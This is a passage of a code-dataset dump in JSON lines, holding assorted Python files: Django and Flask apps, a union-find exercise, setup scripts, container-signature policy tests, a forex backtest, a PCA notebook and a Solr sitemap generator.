print('CREATE', result, 'FROM', inputs, 'BY', f.__name__)\n g = f.__globals__\n marker = object()\n oldvalue = g.get(result_var_name, marker)\n g[result_var_name] = result\n observer = ResultObserver(notifier=result)\n new_args = [EObjectProxy(obj)\n if isinstance(obj, Ecore.EObject)\n else obj\n for obj in args]\n for key, value in kwargs:\n if isinstance(value, Ecore.EObject):\n kwargs[key] = EObjectProxy(obj)\n try:\n f(*new_args, **kwargs)\n finally:\n if oldvalue is marker:\n del g[result_var_name]\n else:\n g[result_var_name] = oldvalue\n result.listeners.remove(observer)\n return result\n return lru_cache()(inner)\n\n\nclass when(object):\n def __init__(self, condition):\n self.condition = condition\n\n def __call__(self, f):\n @wraps(f)\n def inner(*args, **kwargs):\n if self.condition(*args, **kwargs):\n return f(*args, **kwargs)\n return inner\n\n\nclass disjunct(object):\n def __init__(self, *args):\n self.list = args\n\n def __call__(self, f):\n @wraps(f)\n def inner(*args, **kwargs):\n for fun in self.list:\n result = fun(*args, **kwargs)\n if result is not None:\n break\n f(*args, **kwargs)\n return result\n return inner\n\n\nclass mapping_when(object):\n def __init__(self, condition):\n self.condition = condition\n\n def __call__(self, f):\n @wraps(f)\n @when(self.condition)\n @mapping\n def inner(*args, **kwargs):\n return f(*args, **kwargs)\n return inner\n","sub_path":"experimental/m2m/m2mlib.py","file_name":"m2mlib.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"12819400","text":"from django.urls import path, include\nfrom .views import DepartamentoList,\\\n DepartamentoCreate, DepartamentoUpdate, \\\n DepartamentoDelete\n\nurlpatterns = [\n\n path('list/', DepartamentoList.as_view(), name='list_departamentos'),\n path('create/', DepartamentoCreate.as_view(), name='create_departamentos'),\n path('update//', DepartamentoUpdate.as_view(), name='update_departamentos'),\n path('delete//', DepartamentoDelete.as_view(), name='delete_departamentos'),\n\n\n]","sub_path":"apps/departamentos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"255214264","text":"#!/usr/bin/python3\n#Author:pliu\n\n# class Solution:\n# def findCircleNum(self, M):\n# p = [i for i in range(len(M))]\n# def find(x):\n# if p[x] != x:\n# p[x] = find(p[x])\n# return p[x]\n#\n# for i in range(len(M)):\n# for j in range(len(M)):\n# if M[i][j] == 1:\n# a = find(i) ## 这里就是merge操作,重新写一个函数太麻烦了\n# b = find(j)\n# p[a] = b ## 直接修改数组中的根节点\n#\n# for i in range(len(M)): ## 需要多这一步,将所有的点都回归其根节点,然后在判断根的数量有多少\n# find(i)\n# return len(set(p))\n# class Solution:\n# def findCircleNum(self, M):\n# N = len(M)\n# count = 0\n# visited = set()\n#\n# def dfs(i):\n# for j in range(N):\n# if M[i][j] and j not in visited:\n# visited.add(j)\n# dfs(j)\n#\n# for i in range(N):\n# if i not in visited:\n# count += 1\n# visited.add(i)\n# dfs(i)\n#\n# return count\nclass Solution:\n def findCircleNum(self, M):\n f = {}\n s = {}\n count = len(M)\n\n def find(x):\n f.setdefault(x, x)\n # 路径压缩\n if x != f[x]:\n f[x] = find(f[x])\n return f[x]\n\n def union(x, y):\n nonlocal count\n x_father, y_father = find(x), find(y)\n if x_father == y_father: return\n # 将小树的根节点连接到大叔的根节点\n if s.setdefault(x_father, 1) < s.setdefault(y_father, 1):\n f[x_father] = y_father\n s[y_father] += s[x_father]\n else:\n f[y_father] = x_father\n s[x_father] += s[y_father]\n count -= 1\n\n for i in range(len(M)):\n for j in range(i + 1, len(M)):\n if M[i][j] == 1:\n union(i, j)\n return count\n\n\nif __name__ == '__main__':\n M= [[1,1,0],[1,1,0],[0,0,1]]\n print(Solution().findCircleNum(M))","sub_path":"Week07/朋友圈.py","file_name":"朋友圈.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"368456927","text":"from flask import Flask, render_template, request\nfrom app import app, db\nfrom models import CodePlayGround\nfrom hashids import Hashids\n\nhashids = Hashids(salt=app.config['HASH_SALT'])\n\n@app.route('/')\n@app.route('/index')\ndef index():\n\treturn render_template('home/index.html')\n\n@app.route('/run', methods=['GET','POST'])\ndef run():\n\tif request.method == 'GET':\n\t\treturn render_template('run/nocode.message.html')\n\telse:\n\t\thtml = request.form['html']\n\t\tcss = request.form['css']\n\t\tjs = request.form['js']\n\n\t\tcode = {\n\t\t\t'html':html,\n\t\t\t'css':css,\n\t\t\t'js':js\n\t\t}\n\n\t\treturn render_template('run/preview.html', code=code)\n\n@app.route('/save', methods=['POST'])\ndef save():\n\thtml = request.form['html']\n\tcss = request.form['css']\n\tjs = request.form['js']\n\n\tcpg = CodePlayGround(html=html, css=css, js=js)\n\n\tdb.session.add(cpg)\n\tdb.session.commit()\n\n\tid = cpg.id\n\n\treturn hashids.encode(id)\n\n@app.route('/update', methods=['PUT'])\ndef update():\n\treturn ''\n\n@app.route('/fork', methods=['POST'])\ndef fork():\n\treturn ''\n\n@app.route('/cpg/')\n@app.route('/')\ndef get_playground(hashed_id):\n\tid = hashids.decode(hashed_id)\n\n\tcpg = CodePlayGround.query.get(id)\n\n\tif cpg:\n\t\tcode = {\n\t\t\t'html': cpg.html,\n\t\t\t'css': cpg.css,\n\t\t\t'js': cpg.js\n\t\t}\n\t\n\t\treturn render_template('home/index.html', code=code)\n\telse:\n\t\tabort(404)\n\n@app.errorhandler(404)\ndef page_not_found(error=None):\n\tmessage = {\n\t\t'status' : 404,\n\t\t'text' : 'Not Found: ' + request.url\n\t}\n\n#\tif request.is_xhr:\n\t\t\n#\telse:\n\treturn render_template('error.html', message=message)","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"40744084","text":"\"\"\"Mulholland setup module\"\"\"\n\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\n# Always prefer setuptools over distutils\nfrom setuptools import find_packages, setup\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='mulholland',\n version='0.0.1',\n description='Automatic Video Library Manager for TV Shows',\n long_description=long_description,\n\n # The project's main homepage.\n url='https://github.com/Alzakath/mulholland',\n\n # Author details\n author='Alzakath',\n author_email='herve.coatanhay@gmail.com',\n\n # Choose your license\n license='MIT',\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: End Users/Desktop',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.5',\n ],\n\n # What does your project relate to?\n keywords='video tv shows',\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n install_requires=['gevent', 'pyzmq', 'webob'],\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # pip to create the appropriate form of executable for the target platform.\n entry_points={\n 'console_scripts': [\n 'mulholland=mulholland:main'\n ],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"328931419","text":"import pytest\nfrom . import conftest as fix\nimport connaisseur.config as co\nimport connaisseur.exceptions as exc\nimport connaisseur.validators as vals\nfrom connaisseur.image import Image\n\n\n@pytest.fixture(autouse=True)\ndef mock_config_path(monkeypatch):\n def m_safe_path_func(callback: callable, base_dir: str, path: str, *args, **kwargs):\n return callback(path, *args, **kwargs)\n\n monkeypatch.setattr(co, \"safe_path_func\", m_safe_path_func)\n\n co.Config._Config__PATH = \"tests/data/config/sample_config.yaml\"\n co.Config._Config__SECRETS_PATH = \"tests/data/config/sample_secrets.yaml\"\n co.Config._Config__EXTERNAL_PATH = \"tests/data/config/\"\n co.Config._Config__SCHEMA_PATH = \"connaisseur/res/config_schema.json\"\n\n\nnv1 = vals.notaryv1.notaryv1_validator.NotaryV1Validator\nstatic = vals.static.static_validator.StaticValidator\ncosign = vals.cosign.cosign_validator.CosignValidator\nstatic_config = {\n \"validators\": [\n {\n \"name\": \"default\",\n \"type\": nv1,\n },\n {\n \"name\": \"harbor\",\n \"type\": nv1,\n },\n {\"name\": \"allow\", \"type\": static},\n {\"name\": \"deny\", \"type\": static},\n {\"name\": \"cosign-example\", \"type\": cosign},\n {\"name\": \"ext\", \"type\": nv1},\n ],\n \"policy\": [\n {\"pattern\": \"*:*\", \"with\": {\"delegations\": [\"phbelitz\", \"chamsen\"]}},\n {\n \"pattern\": \"docker.io/*:*\",\n \"validator\": \"dockerhub\",\n \"with\": {\"delegations\": [\"phbelitz\"]},\n },\n {\"pattern\": \"k8s.gcr.io/*:*\", \"validator\": \"allow\"},\n {\"pattern\": \"gcr.io/*:*\", \"validator\": \"allow\"},\n {\n \"pattern\": \"docker.io/securesystemsengineering/*:*\",\n \"validator\": \"dockerhub\",\n \"with\": {\"delegations\": [\"someuserthatdidnotsign\"]},\n },\n {\n \"pattern\": \"docker.io/securesystemsengineering/sample\",\n \"validator\": \"dockerhub\",\n \"with\": {\"delegations\": [\"phbelitz\", \"chamsen\"]},\n },\n {\n \"pattern\": \"docker.io/securesystemsengineering/sample:v4\",\n \"validator\": \"allow\",\n },\n {\n \"pattern\": \"docker.io/securesystemsengineering/connaisseur:*\",\n \"validator\": \"allow\",\n },\n {\n \"pattern\": \"docker.io/securesystemsengineering/sample-san-sama\",\n \"validator\": \"allow\",\n },\n {\n \"pattern\": \"docker.io/securesystemsengineering/alice-image\",\n \"validator\": \"dockerhub\",\n },\n ],\n}\nmatch_image_tag = \"docker.io/securesystemsengineering/sample:v1\"\nmatch_image_digest = (\n \"docker.io/securesystemsengineering/sample@sha256:\"\n \"1388abc7a12532836c3a81bdb0087409b15208f5aeba7a87aedcfd56d637c145\"\n)\n\n\n@pytest.mark.parametrize(\n \"config_path, exception\",\n [\n (\"sample_config\", fix.no_exc()),\n (\"err\", pytest.raises(FileNotFoundError)),\n (\"err1\", pytest.raises(exc.NotFoundException)),\n (\n \"err2\",\n pytest.raises(\n exc.InvalidConfigurationFormatError, match=r\".*invalid format.*\"\n ),\n ),\n (\n \"err3\",\n pytest.raises(exc.InvalidConfigurationFormatError, match=r\".*validator.*\"),\n ),\n (\n \"err4\",\n pytest.raises(exc.InvalidConfigurationFormatError, match=r\".*roots.*\"),\n ),\n (\n \"err5\",\n pytest.raises(\n exc.InvalidConfigurationFormatError, match=r\".*invalid format.*\"\n ),\n ),\n ],\n)\ndef test_config(config_path, exception):\n co.Config._Config__PATH = f\"tests/data/config/{config_path}.yaml\"\n with exception:\n config = co.Config()\n assert len(config.validators) == len(static_config[\"validators\"])\n assert len(config.policy) == len(static_config[\"policy\"])\n for index, validator in enumerate(config.validators):\n assert validator.name == static_config[\"validators\"][index][\"name\"]\n assert isinstance(validator, static_config[\"validators\"][index][\"type\"])\n for index, rule in enumerate(config.policy):\n assert rule[\"pattern\"] == static_config[\"policy\"][index][\"pattern\"]\n\n\n@pytest.mark.parametrize(\n \"key_name, name, exception\",\n [\n (\"default\", \"default\", fix.no_exc()),\n (\"harbor\", \"harbor\", fix.no_exc()),\n (None, \"default\", fix.no_exc()),\n (\"harborr\", \"\", pytest.raises(exc.NotFoundException)),\n ],\n)\ndef test_get_notary(key_name, name, exception):\n config = co.Config()\n with exception:\n assert config.get_validator(key_name).name == name\n\n\n@pytest.mark.parametrize(\n \"rule, image, comp_count, comp_len, pre_len\",\n [\n (\"\", \"\", 1, [2], [0]),\n (\"*:*\", match_image_tag, 1, [3], [0]),\n (\"doc*/*\", match_image_tag, 2, [4, 3], [3, 0]),\n (\"*/sec*/*:*\", match_image_tag, 3, [1, 4, 3], [0, 3, 0]),\n (\"*@sha256:*\", match_image_digest, 1, [10], [0]),\n ],\n)\ndef test_match(rule: str, image: str, comp_count: int, comp_len: list, pre_len: list):\n match = co.Match(rule, image)\n rule_with_tag = rule if \":\" in rule else f\"{rule}:*\"\n assert match.key == rule\n assert match.pattern == rule_with_tag\n assert match.component_count == comp_count\n assert match.component_lengths == comp_len\n assert match.prefix_lengths == pre_len\n\n\n@pytest.mark.parametrize(\"rule, exist\", [(\"\", False), (\"*\", True)])\ndef test_match_bool(rule: str, exist: bool):\n match = co.Match(rule, \"image\")\n assert bool(match) == exist\n\n\n@pytest.mark.parametrize(\n \"rule1, rule2, image\",\n [\n (\"\", \"*\", match_image_tag),\n (\"*\", \"*:*\", match_image_tag),\n (\"*:*\", \"*/*\", match_image_tag),\n (\"*/*\", \"docker*/*\", match_image_tag),\n (\"docker*/*\", \"*/*/*\", match_image_tag),\n (\"*/*/image:v1\", \"*/sam*/*\", match_image_tag),\n ],\n)\ndef test_match_compare(rule1: str, rule2: str, image: str):\n m1 = co.Match(rule1, image)\n m2 = co.Match(rule2, image)\n fighters = [m1, m2]\n assert m1.compare(m2) == fighters[1]\n\n\n@pytest.mark.parametrize(\n \"image, rule\",\n [\n (\"image:tag\", \"docker.io/*:*\"),\n (\"reg.io/image:tag\", \"*:*\"),\n (\"k8s.gcr.io/path/image\", \"k8s.gcr.io/*:*\"),\n (\n \"docker.io/securesystemsengineering/sample:v4\",\n \"docker.io/securesystemsengineering/sample:v4\",\n ),\n ],\n)\ndef test_get_policy_rule(image: str, rule):\n c = co.Config()\n assert str(c.get_policy_rule(Image(image))) == rule\n\n\ndef test_get_matching_rule_error():\n with pytest.raises(exc.NoMatchingPolicyRuleError):\n c = co.Config()\n c.policy = c.policy[1:]\n assert c.get_policy_rule(Image(\"reg.io/image\"))\n","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":6752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"206689504","text":"# Tuples -- Sequence of elments separed with comma which are declared inside ( )...\n\n# a=(1,2,3,4)\n\n# print(type(a))\n\n# a=1,2,3,4\n\n# print(type(a))\n\n# a=(1)\n# print(type(a))\n\n# a=1\n# print(type(a))\n\n# a=(1,) # single value tuple\n\n# Tuples are immutable.. (we cannot make changes).\n\na=(1,11,54,'datascience','devops','cricket',[23,24,25])\n\n\n# accessing elments inside the tuple..(indexing)\n\n\n# print(a[4])\n\n# print(a[1:6])\n\n# print(a[0:7:2]) # slicing\n\n# print(a[-2])\n\n# a[1]=23\n\n# del a[1]\n\n# Basic Operations:-\n\n\t# concatenation(+):- Adding 2 or more tuples..\n\t# repetition(*):- Repeating same tuple elements multiple times..\n\n\n# print((1,2,3)+(4,5,6))\n\n# print((3,4,5)*3)\n\n\na=(3,4,59,1,2,0,7,3,6,1,6,2,3,7)\n\n# print(a.count(3))\n# print(a.index(7))\n\n# print(len(a))\n\nrange(0,21)\nb=()\nc=()\n\nprint(b) #(0,2,4,6,8,10,12,14,16,18,20)\nprint(c) #(1,3,5,7,9,11,13,15,17,19)\n\n","sub_path":"tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"395688895","text":"import string \nimport random\ndef urlshort(s):\n x = \"cp.li\"\n z = \".w\"\n res = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))\n x = x+res+z\n return(x)\nurl = {}\nn = int(input(\"Total Number of URLs you want to short : \"))\nwhile(n):\n s = input(\"Enter your Url : \")\n try:\n x = url[s]\n except:\n x = urlshort(s)\n url[s] = x\n print(x)\n n-=1\n ","sub_path":"URLshortner.py/divyanshsikarwar.py","file_name":"divyanshsikarwar.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"476753677","text":"import argparse\n\nfrom util import *\nfrom technical_indicators import *\n\n\n# parse start_date and end_date from input\n\nparser = argparse.ArgumentParser(\n description='Forex trading naive strategy implementation')\nparser.add_argument('--start_date', nargs='?', help='backtesting start date', default='2017-01-01')\nparser.add_argument('--end_date', nargs='?', help='backtesting end date', default='2017-04-01')\n\nargs = parser.parse_args()\n\nstart_date = args.start_date # backtesting start date\nend_date = args.end_date # backtesting end date\n\n# set some constants\n\ninstrument = \"EURUSD\" # currency pair\ngranularity = '1D' # data granularity\n\n# economical constants\n\nbudget = 100000 # total budget\npip = 0.00001 # pip value\ntrade = 1*pip # each trade value\ntakeProfit = 500*pip # take profit value\nstopLoss = 250*pip # stop loss value\nparams = [budget, pip, trade,\n takeProfit, stopLoss] # array with all economical constants\n\n# download and load data\n\ndata, _ = get_tick_data(instrument, start_date, end_date, granularity)\nif not _:\n get_tick_to_granularity(instrument, start_date, end_date, granularity)\n data, _ = get_tick_data(instrument, start_date, end_date, granularity)\n\n# add new columns to data dataframe with bid and ask averages\n\n# calculate averages #\n\nlow = (data['lowAsk']+data['lowBid'])/2\nhigh = (data['highAsk']+data['highBid'])/2\nclose = (data['closeAsk']+data['closeBid'])/2\nopen = (data['openAsk']+data['openBid'])/2\n\n# add new columns to dataframe #\n\ndata['low'] = low\ndata['high'] = high\ndata['close'] = close\ndata['open'] = open\n\n# indicators\n\nsmma_low = moving_average(data, 4, 'low') # moving averages\nsmma_high = moving_average(data, 10, 'high') #\n\natr = average_true_range(data, 5, 'high', 'low', 'close') # average true range\n\nmacd = macd(data, 5, 31, 'close')[0] # moving average convergence divergence\n\nUpper, Lower = bollinger_bands(data, 16, 'close') # bollinger bands\n\nk = stochastic_oscillator_k(data, 'high', 'low', 'close') # stochastic oscilators\nd = stochastic_oscillator_d(data, 3, 'high', 'low', 'close')\n\n# buying and selling conditions\n\n# long conditions #\n\nenter_long = ((crossover(k, d)) & (Upper >= Upper.shift(1))\n & (Lower >= Lower.shift(1)) & (atr > (atr.shift(1) + 0.0001)))\n\nsell_long = crossunder(close, smma_low)\n\n# short conditions #\n\nenter_short = ((crossover(d, k)) & (Upper <= Upper.shift(1))\n & (Lower <= Lower.shift(1)) & (atr > (atr.shift(1) + 0.0001)))\n\nsell_short = crossunder(close, smma_high)\n\n# calculates trades and profit\n\nlong_trades, short_trades = get_trades([enter_long, sell_long, enter_short, sell_short], data, params)\n\ntrades_profit = get_trades_profit([long_trades, short_trades], data)\n\n# print all trades\n\nfor trade in trades_profit:\n print(trade)\n","sub_path":"scripts/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"557969054","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[2]:\n\n\n#-------------------------------------------------------------------------------------------------------------------------------\n# By Alexandra Lee (July 2018) \n#\n# Apply PCA or ICA to compress Pseudomonas gene expression data (from ArrayExpress) and \n# visualize expression data projected onto first two reduced dimensions\n# \n# Input: Pa gene expression data from ArrayExpress (matrix: sample x gene)\n# Data compression method: PCA or ICA\n# Output: Reduced Pa gene expressiond ata (matrix: sample x 2 linear combination of genes)\n#-------------------------------------------------------------------------------------------------------------------------------\nimport os\nfrom sklearn.decomposition import PCA, FastICA\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nnp.random.seed(123)\n\n\n# In[3]:\n\n\n# load arguments\ndata_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"all-pseudomonas-gene-normalized.pcl\")\nmap_file = os.path.join(os.path.dirname(os.getcwd()), \"metadata\", \"mapping_sampleID_medium.txt\")\ncomponent_num = 2\n\n# specify either 'ica' or 'pca'\nmethod = 'pca' \n\n\n# In[4]:\n\n\n# read in data\ndata = pd.read_table(data_file, header=0, sep='\\t', index_col=0)\nX = data.transpose()\nX.head(5)\n#X.shape\n\n\n# In[ ]:\n\n\n# PCA\nif method == 'pca':\n reduced = PCA(n_components=component_num)\n reduced_X = reduced.fit_transform(X)\n# ICA\nelse:\n reduced = FastICA(n_components=component_num)\n reduced_X = reduced.fit_transform(X)\n\n\n# In[ ]:\n\n\n# Map sample id to clinial phenotype (i.e. experimental condition)\n\n# Note:\n# According to the source (https://github.com/scikit-learn/scikit-learn/blob/14031f6/sklearn/decomposition/pca.py#L310),\n# input will be transformed by np.array() before doing PCA. So row index will be lost during \n# PCA.fit_transform(X) even using a structured array or a pandas DataFrame. However, the order of the data is preserved, \n# meaning you can attach the index back afterward\n\nX_ann = pd.DataFrame(reduced_X, index=X.index, columns=['1', '2'])\n\n# read in mapping file (sample id --> phenotype)\nmapper = pd.read_table(map_file, header=0, sep='\\t', index_col=0)\n\n# Join \nX_new = pd.merge(X_ann, mapper, left_index=True, right_index=True)\nX_new.head(10)\n#X_new.shape\n\n\n# In[ ]:\n\n\n# Plot\nfg = sns.lmplot(x='1', y='2', data=X_new, hue='medium', fit_reg=False)\nfg.add_legend()\nfig_file = os.path.join(os.path.dirname(os.getcwd()), \"viz\",\"{}.png\".format(method))\nfg.fig.suptitle(method.upper()+' compressed data')\nfg.savefig(fig_file)\n\n\n# In[ ]:\n\n\n# Output compressed data\nfile_out = os.path.join(os.path.dirname(os.getcwd()), \"encoded\",\"{}_encoded.txt\".format(method))\nX_new.to_csv(file_out, sep='\\t')\n\n","sub_path":"exploration/scripts/nbconverted/PCA_ICA_model.py","file_name":"PCA_ICA_model.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"603664562","text":"import math\nfrom django.contrib.sites.models import Site, get_current_site\nfrom django.contrib.sitemaps import Sitemap\nfrom django.contrib.sitemaps import GenericSitemap\nfrom django.views.decorators.cache import cache_page\n\nfrom urllib2 import *\nimport simplejson\nimport json\nimport urllib\nfrom django.conf import settings\nimport datetime\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import activate\nfrom string import Template\n\n\n# custom sitemap class\n\n\n\nclass RunAppMap(GenericSitemap):\n \"\"\"\n Skeleton class to generate sitemaps based on data from a Solr index.\n\n This sitemap is \"lazy\" compared to Django's built-in Sitemap, in that\n it does not fetch the data needed to compute all the URLs at once.\n Instead of using Django's built-in pagination, we delegate pagination\n operations to Solr itself using its `start` and `rows` parameters.\n \n \"\"\"\n #limit = 5000 #http://stackoverflow.com/questions/2079786/caching-sitemaps-in-django\n def __init__(self, groupBy, fieldList, view, freq, prio, page=1, *args, **kwargs):\n self.groupBy = groupBy\n self.fieldList = fieldList\n self.view = view\n self.freq = freq\n self.prio = prio\n self.pagenum = page\n self.results = self.pager (self.groupBy, self.fieldList, self.view)\n #print 'init'\n\n \n\n\n def lastmod(self, obj):\n return datetime.datetime.utcnow()\n\n def get_urls(self, site=None, page=None, protocol=None):\n if site is None:\n if Site._meta.installed:\n try:\n site = Site.objects.get_current()\n except Site.DoesNotExist:\n pass\n if site is None:\n raise ImproperlyConfigured(\"\"\"In order to use Sitemaps you must\\\n either use the sites framework or\\\n pass in a Site or RequestSite\\\n object in your view code.\"\"\")\n ##import pdb; pdb.set_trace()\n urls = []\n self.pagenum = page\n # This is where the `get_urls` deviates from the built-in `Sitemap`\n # class; there, the paginator is called on the next line. Instead,\n # the `items` method only gets enough results to populate a single page.\n\n for item in self.items():\n if self.location(item):\n loc = \"http://%s%s\" % (site.domain, self.location(item))\n priority = self.priority(item)\n url_info = {\n 'location': loc,\n 'lastmod': self.lastmod(item),\n 'changefreq': self.changefreq(item),\n 'priority': str(priority is not None and priority or '')\n }\n \n urls.append(url_info)\n return urls\n \n def items(self):\n\n end = int(self.pagenum) * self.limit\n start = end - self.limit\n return self.results[start:end]\n\n def location(self, obj):\n \"\"\"\n Inputs:\n `obj`: A single object from the collection of objects returned by\n the `items` method.\n\n Returns:\n An absolute path to the object. This is the path component of the\n URI that will be displayed in the sitemap.\n \n \"\"\"\n ##import pdb; pdb.set_trace()\n try:\n activate(obj['lang'])\n return reverse(obj['view'], kwargs=obj['params'])\n except:\n \treturn None\n\n def priority(self, obj):\n \"\"\"\n Inputs:\n `obj`: A single object from the collection of objects returned by\n the `items` method.\n\n Returns:\n An absolute path to the object. This is the path component of the\n URI that will be displayed in the sitemap.\n \n \"\"\"\n return self.prio\n\n def changefreq(self, obj):\n \"\"\"\n Inputs:\n `obj`: A single object from the collection of objects returned by\n the `items` method.\n\n Returns:\n An absolute path to the object. This is the path component of the\n URI that will be displayed in the sitemap.\n \n \"\"\"\n return self.freq\n\n\n def pager (self, groupBy, fieldList, view):\n items, pages = self.requester (groupBy, 0, fieldList, view)\n #print 'pager'\n if pages > 0:\n for page in range(1,pages):\n pageitems, nopages = self.requester (groupBy, page, fieldList, view)\n items.extend (pageitems)\n \n return items\n\n def requester (self, groupBy, page, fieldList, view):\n pageSize = 1000\n #print 'requester', page, groupBy\n start = page * pageSize\n url = Template ('$solr/select?&q=*:*&group=true&group.field=$groupBy&wt=json&rows=$rows&group.limit=1&sort=raceYear%20desc&start=$start&fl=$fieldList')\n if not groupBy: groupBy='countryId'\n if not fieldList: fieldList=['nofieldsplease']\n url = url.substitute (solr=settings.RUNMODO_SOLR_URL, groupBy=groupBy, rows=str(pageSize), start=str(start), fieldList=str(','.join(fieldList)))\n\n #conn = urlopen(settings.RUNMODO_SOLR_URL + '/select?&q=*:*&group=true&group.field='+ groupBy +'&wt=json&rows='+ str(pageSize) +'&group.limit=1&sort=raceYear%20desc&start='+ str(start) +'&fl='+ ','.join(fieldList))\n conn = urlopen(url)\n response = simplejson.load(conn)\n count = response['grouped'][groupBy]['ngroups']\n pages = int(math.ceil(count / pageSize))\n items = []\n for lang in ['en','fr']:\n for doc in response['grouped'][groupBy]['groups']:\n params = doc['doclist']['docs'][0]\n item = {\n 'value': doc['groupValue'],\n 'view': view,\n 'params': params,\n 'lang': lang\n }\n items.append(item)\n\n return items, pages","sub_path":"runapp/sitemaps.py","file_name":"sitemaps.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"378713470","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 2019/3/25 13:11\n# @File : setup.py.py\n\nimport os\nimport re\nimport sys\nimport setuptools\n\n\ndef get_reqs_from_files(requirements_files):\n for requirements_file in requirements_files:\n if os.path.exists(requirements_file):\n return open(requirements_file, 'r').read().split('\\n')\n return []\n\n\ndef parse_requirements(requirements_files=['requirements.txt']):\n requirements = []\n for line in get_reqs_from_files(requirements_files):\n # For the requirements list, we need to inject only the portion\n # after egg= so that distutils knows the package it's looking for\n # such as:\n # -e git://github.com/openstack/nova/master#egg=nova\n if re.match(r'\\s*-e\\s+', line):\n requirements.append(re.sub(r'\\s*-e\\s+.*#egg=(.*)$', r'\\1',\n line))\n # such as:\n # http://github.com/openstack/nova/zipball/master#egg=nova\n elif re.match(r'\\s*https?:', line):\n requirements.append(re.sub(r'\\s*https?:.*#egg=(.*)$', r'\\1',\n line))\n # -f lines are for index locations, and don't get used here\n elif re.match(r'\\s*-f\\s+', line):\n pass\n # argparse is part of the standard library starting with 2.7\n # adding it to the requirements list screws distro installs\n elif line == 'argparse' and sys.version_info >= (2, 7):\n pass\n else:\n requirements.append(line)\n\n return requirements\n\n\ndef parse_dependency_links(requirements_files=['requirements.txt']):\n dependency_links = []\n # dependency_links inject alternate locations to find packages listed\n # in requirements\n for line in get_reqs_from_files(requirements_files):\n # skip comments and blank lines\n if re.match(r'(\\s*#)|(\\s*$)', line):\n continue\n # lines with -e or -f need the whole line, minus the flag\n if re.match(r'\\s*-[ef]\\s+', line):\n dependency_links.append(re.sub(r'\\s*-[ef]\\s+', '', line))\n # lines that are only urls can go in unmolested\n elif re.match(r'\\s*https?:', line):\n dependency_links.append(line)\n return dependency_links\n\n\nsetuptools.setup(\n name='karl_pkg',\n version='1.0.0',\n description='karl python package sample',\n author='karl',\n author_email='karl@karl.com',\n\n packages=setuptools.find_packages(exclude=['bin']),\n py_modules=[],\n include_package_data=True,\n install_requires=[\n 'numpy==1.13.3',\n 'pandas==0.20.3',\n ],\n dependency_links=[],\n\n entry_points={\n 'console_scripts': [\n 'karl-print = karl_pkg.cmd.print_cmd:main',\n ]\n },\n)\n","sub_path":"pypi_install_script/karl_pkg-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"80205993","text":"import rclpy\nfrom rclpy.node import Node\nimport math\n\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import Float32\nfrom sensor_msgs.msg import Joy\n\nclass TeleopNode(Node):\n\n def __init__(self):\n super().__init__('teleop_publisher')\n self.mob_publisher_ = self.create_publisher(Twist, 'cmd_vel', 10)\n self.drum_publisher_ = self.create_publisher(Float32, 'drum_vel', 10)\n self.arm_publisher_ = self.create_publisher(Float32, 'arm_vel', 10)\n\n self.subscriber_ = self.create_subscription(Joy, 'joy', self.joy_callback,10)\n self.subscriber_\n\n # keep the last msg to only change the velocity if the joy message changes\n self.last_joy_input = Joy()\n\n def joy_callback(self, msg):\n #first check if the joy con input has changes and if not return imediately\n if (msg.axes == self.last_joy_input.axes) & (msg.buttons == self.last_joy_input.buttons):\n return\n\n # joy input changes, convert the joy inputs into movment commands\n\n # first for the mobility base axes[0] is the vertical component of the left stick and axes[1] is the horizontal component of the left stick\n velocity = Twist()\n\n speed = math.sqrt((msg.axes[0])**2 + (msg.axes[1])**2)\n if speed > 1:\n speed = float(1)\n velocity.linear.x = speed\n\n angle = 